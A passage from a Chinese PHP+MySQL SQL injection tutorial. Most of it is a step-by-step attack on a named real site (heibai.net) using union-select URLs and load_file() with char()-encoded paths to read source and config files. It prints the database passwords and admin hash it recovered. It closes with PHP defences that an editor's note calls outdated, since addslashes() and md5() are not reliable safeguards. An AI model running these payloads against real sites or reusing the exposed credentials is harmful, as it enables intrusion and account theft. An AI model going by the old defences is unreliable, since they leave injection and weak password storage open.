我们看读出来的内容 Å|ÿÿ? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answerhttp://www.yoursite.com (?ì[?ûûKAì[?ì[? 127.0.0.1 d|?ÿ? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?EüKAMüKA 127.0.0.1 222 222222223423 虽然乱码一堆,但是我们还是可以看出用户名是admin,密码是698d51a19d8a121ce581499d7b701668,后面其它的是另外的信息。 通过这种方法我们就实现了曲线跨库,下面的例子中也会提到哦!
说了这么多下面我们来具体的使用一次,这次测试的对象是国内一著名安全类站点——黑白网络 听人家说黑白有漏洞?我们一起去看看吧。 http://www.heibai.net/down/show.php?id=5403%20and%201=1 正常显示。 如图35
http://www.heibai.net/down/show.php?id=5403%20and%201=2 显示不正常。 如图36
ºÃ£¬ÎÒÃǼÌÐø http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1 ÏÔʾ½á¹ûÈçÏ Èçͼ37
注意看图中没有显示程序名,而且还附带了 Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578
晕了,网站路径出来了,那可就死定了哦! 我们继续,直到我们猜到 http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 的时候正常显示了。 如图38
好我们转换语句成为 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 显示如图39
看看简介处显示为12,我们可以猜测此处应该为字符型! Ok,我们下面看看文件内容先 D:/web/heibai/down/show.php转化成ascii后为 char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112) 我们 view-sourcehttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19 view-source:是指察看源代码,至于为什么用,我们后面将讲到 显示出它的源代码 如图40
因为在show.php中有一句 <META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'> 如果我们直接在浏览器里提交会跳转到list.php 我们发现这句require ("./include/config.inc.php"); 好东西,应该放这配置文件,ok继续 d:/web/heibai/down/include/config.inc.php 转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) 我们输入 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 显示结果如图41
里面内容主要有 ………………….. ymDown (夜猫下载系统) 是一个应用于网站提供下载服务的的程序 // ------------------------- -------- ------------------------- // // 常规设置 // // ------------------------- -------- ------------------------- //
// 数据库信息 $dbhost = "localhost"; // 数据库主机名 $dbuser = "download";// 数据库用户名 $dbpasswd = "kunstar988"; // 数据库密码 $dbname = "download"; // 数据库名
// Cookie 名称 $cookie_name = "heibai"; // 版本号 $version = "1.0.1";
// 数据表名 $down_table = ymdown; $down_user_table = ymdown_user; $down_sort1_table = ymdown_sort1; $down_sort2_table = ymdown_sort2; 晕原来用的是夜猫的下载系统,而且我们知道了 $dbuser = "download";// 数据库用户名 $dbpasswd = "kunstar988"; // 数据库密码 说不定呆会有用哦。 用的表名是默认的表名,我们知道夜猫的管理员密码放在ymdown_user中 我们继续 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user 结果如图42
根据提示我们知道文件大小处的是username,应用平台处的是password(对照图36) 即username=dload,password=6558428,夜猫的后台默认在admin目录下,我试验了很久都没有找到,晕之。 想直接连接mysql,发现telnet端口并没有开放。我们去看看别的吧! http://www.heibai.net/vip/article/login.php 看起来像是会员的登陆哦,我们看看先 d:/web/heibai/vip/article/login.php 转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112) 我们输入 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19 结果如图43:
其中 require ("./include/global.php"); require ("./include/config.inc.php"); require ("./mainfunction.php"); require ("./function.php"); 当然了,我们去看config.inc.php吧 d:/web/heibai/vip/article/include/config.inc.php 转成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) 输入 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 结果如图44
ÏÔʾÁ˺ܶàºÃ¶«Î÷Ŷ
$dbhost = "localhost"; // 数据库主机名 $dbuser = "root"; // 数据库用户名 $dbpass = "234ytr8ut"; // 数据库密码 $dbname = "article"; // 数据库名 $ymcms_user_table = "user"; $ymcms_usergroup_table = "usergroup"; $ymcms_userrace_table = "userrace"; 表还是默认的表,而且出来了root的密码 要是能连上它的mysql该多好啊,那样我们就可以into outfile了 痛苦的找了找phpmyadmin,没有找见,或许根本就没有用。 读c:/winnt/php.ini发现 ; Magic quotes ; ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = On 55555555,痛苦中,我们看看能不能搞几个会员账号 猜测会员账号放在user表中,我们直接读data下article文件夹里的user.myd文件 Article/user.myd转换成 char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100) 我们输入 http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19 结果如图45:
晕了,竟然没有返回。我们来读Article/user.frm http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19 结果如图46
晕了,表结构都在,而且读Article/user.myi时也成功,可是为什么Article/user.myd读不出来呢?要是magic_quotes_gpc=Off我们还可以into outfile来看看,可是…… 郁闷中,测试就这样结束吧,下面的工作还是留给你们来完成吧! 文中所述问题已经通知星坤了! 四:php+mysql注入的防范方法。 在上一期的专题里已经讲了很多的防范方法,这里我就主要讲一下php+mysql注射攻击的防范方法。 大家看到,在magic_quotes_gpc=On的时候,很多的注射攻击已经没有作用了。 我们可以利用这个来加固我们的程序。Addslashes()函数等同于magic_quotes_gpc=On,而且与magic_quotes_gpc=On也不冲突,我们可以这样过滤 $username = addslashes($username); $query="SELECT * FROM users WHERE userid='$username'"); 对于id型我们可以利用intval()函数,intval()函数可以将变量转换成整数类型,这样就可以了。 我们可以这样 $id = intval($id); $query="SELECT * FROM alphadb WHERE articleid='$id'"); 如果是字符型的呢? 我们可以先用addslashes()过滤一下,然后再过滤”%”和”_”. 例如: $search = addslashes($search); $search = str_replace("_","\_",$search); $search = str_replace("%","\%",$search); 记得,可千万别在magic_quotes_gpc=On的情况下替换\为\\,如下: $password=str_replace("\\","\\\\",$password); 我记得在darkness的文章《对某PHP站点的一次渗透》中提到过这个问题(在光盘中有收录)。 还有的就是登陆的地方,如果是只用一个管理员管理的话,我们可以直接对username和passwd用md5加密,这样就不用害怕注入技术的发展了。 Username=md5($HTTP_POST_VARS["username"]); Passwd=md5($HTTP_POST_VARS["passwd"]); 我的后台登陆就是这样子的哦。 (编者注:magic_quotes_gpc 已在 PHP 5.4 中被移除,addslashes() 在 GBK 等多字节字符集下可能被绕过,现行做法是使用 PDO 或 mysqli 的预处理语句(参数化查询),口令存储应使用 password_hash() 而不是 md5()。)